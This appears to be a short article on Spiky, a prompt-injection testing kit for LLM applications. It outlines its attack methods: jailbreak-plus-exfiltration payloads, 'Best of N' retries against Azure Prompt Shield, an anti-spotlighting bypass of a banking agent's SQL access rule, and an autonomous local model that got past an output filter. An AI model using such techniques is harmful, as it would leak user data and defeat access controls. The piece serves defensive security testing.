█████╗ ██████╗ ███████╗ █████╗ ██╗ ██╗ ██╗ ██╔══██╗ ██╔══██╗ ██╔════╝ ██╔══██╗ ██║ ██║ ███║ ███████║ ██████╔╝ █████╗ ███████║ ███████║ ╔██║ ██╔══██║ ██╔══██╗ ██╔══╝ ██╔══██║ ╔════██║ ██║ ██║ ██║ ██║ ██║ ███████╗ ██║ ██║ ██║ ██║ ╔═╝ ╔═╝ ╔═╝ ╔═╝ ╔══════╝ ╔═╝ ╔═╝ ╔═╝ ╔═╝
. * . . *
* . *
.-~~~-.
__|_______|__
( . . . . )
'~~~~~~~~~~~~~'
| |
* . . *
. * . .
Penetration testing for large language model (LLM) applications is often bogged down by a mismatch between available tooling and real-world implementations. Security engineers are frequently faced with features like "summarize my inbox" embedded deep within complex application workflows. Standard red-teaming tools expect direct API access and focus on model-level safety rather than application logic. This disconnect leaves security teams manually crafting custom payloads to test specific environments, such as file uploads to an S3 bucket that trigger asynchronous Lambda functions.
To address this gap, Donato Capitella and their team at ReverSec developed Spiky (Simple Prompt Injection Kit for Evaluation and Exploitation). Spiky is an open-source framework designed to decouple attack payloads from target applications via a thin Python abstraction layer. Instead of firing generic prompts at an inference endpoint, Spiky uses composable datasets to mix base user inputs, jailbreak patterns, and specific malicious instructions like markdown image exfiltration or cross-site scripting. In a demonstration against an inbox summarization tool, Spiky quickly established baseline exploitability. When faced with active defenses like Azure Prompt Shield, the tool launched iterative attacks, using a "Best of N" technique to run up to 10 variations per payload, effectively doubling the attack success rate.
The danger of relying on LLMs for application logic was highlighted in a case study involving a SQL-based banking agent. Developers attempted to enforce data access controls by instructing the LLM to append a user ID WHERE clause to generated database queries. When Capitella bypassed this restriction using an anti-spotlighting technique, the developers responded with a naive output filter checking for the exact string. In response, they deployed an uncensored 35-billion parameter Qwen model running locally on an AMD Strix Halo workstation. Operating as an autonomous attacker, the local model discovered a working jailbreak that bypassed the new filter in just three attempts. Ultimately, the exercise proved that security controls must exist strictly outside the generative loop, relying on deterministic programmatic mechanisms like PostgreSQL row-level security.